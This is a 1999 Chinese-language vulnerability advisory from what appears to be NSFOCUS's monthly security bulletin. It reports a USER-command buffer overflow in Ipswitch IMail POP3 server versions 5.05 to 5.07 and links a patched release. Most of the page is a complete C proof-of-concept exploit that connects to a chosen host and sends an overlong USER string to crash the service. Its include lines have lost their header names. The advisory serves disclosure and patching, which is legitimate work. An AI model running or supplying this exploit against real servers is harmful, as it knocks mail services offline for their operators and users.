首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第3期->最新漏洞
期刊号: 类型: 关键词:
Ipswitch's IMAIL POP3 server漏洞

作者:Interrupt (mike@eeye.com)
主页:http://www.ipswitch.com
日期:1999-11-15


  ◆Ipswitch's IMAIL POP3 server漏洞

发现者:Interrupt (mike@eeye.com)

由于在 Ipswitch's IMAIL POP3服务器中没有进行恰当的边界检查,当发送一个长用户名时 (via "USER <200-500字符>"),系统产生了漏洞。

在5.07、5.06、5.05版中都存在此问题,此问题可能引发拒绝服务问题,其他级别的危害程度尚未验证。

Exploit (by Interrupt):

/*
  * IMAIL 5.07 POP3 Overflow
  * By: Mike@eEye.com
  *
  * Demonstrates vulnerability
  */

  #include
  #include

#ifdef WINDOWS
  #include
  #include
#else
  #include
  #include
  #include
  #include
#endif

#ifndef WINDOWS
  #define SOCKET_ERROR -1
  #define closesocket(sock) close(sock)
  #define WSACleanup() ;
#endif

char overflow[] =
  "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";

int main(int argc, char *argv[])
{
#ifdef WINDOWS
     WSADATA wsaData;
#endif

    struct hostent *hp;
    struct sockaddr_in sockin;
    char buf[300], *check;
    int sockfd, bytes;
    char *hostname;
    unsigned short port;

    if (argc <= 1)
    {
       printf("IMAIL POP3 Overflow\n");
       printf("By: Mike@eEye.com\n\n");

       printf("Usage: %s [hostname] [port]\n", argv[0]);
       printf("If port is not specified we use '110'\n");

       exit(0);
    }

    hostname = argv[1];
    if (argv[2]) port = atoi(argv[2]);

    else port = atoi("110");

    printf("IMAIL POP3 Overflow\n");
    printf("By: Mike@eEye.com\n\n");

#ifdef WINDOWS
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    {
    fprintf(stderr, "Error setting up with WinSock v1.1\n");
    exit(-1);
    }
#endif

    hp = gethostbyname(hostname);
    if (hp == NULL)
    {
    printf("ERROR: Uknown host %s\n", hostname);
    exit(-1);
    }

    sockin.sin_family = hp->h_addrtype;
    sockin.sin_port = htons(port);
    sockin.sin_addr = *((struct in_addr *)hp->h_addr);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
    {
    printf("ERROR: Socket Error\n");
    exit(-1);
    }

    if ((connect(sockfd, (struct sockaddr *) &sockin,
       sizeof(sockin))) == SOCKET_ERROR)
    {
     printf("ERROR: Connect Error\n");
     closesocket(sockfd);
    WSACleanup();
    exit(-1);
    }

    printf("Connected to [%s] on port [%d], sending overflow....\n",
    hostname, port);

   /* Check to see if we get a +OK error code. If so then proceed. */
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
    printf("ERROR: Recv Error\n");
    closesocket(sockfd);
    WSACleanup();
    exit(1);
   }

   buf[bytes] = '\0';
   check = strstr(buf, "+OK");
   if (check == NULL)
   {
    printf("ERROR: NO +OK response from inital connect\n");
    closesocket(sockfd);
    WSACleanup();
    exit(-1);
   }

   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
    printf("ERROR: Send Error\n");
    closesocket(sockfd);
    WSACleanup();
    exit(-1);
   }

   printf("Sent.\n");

   closesocket(sockfd);
   WSACleanup();
}

补丁:

下载最新版软件:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe



版权所有,未经许可,不得转载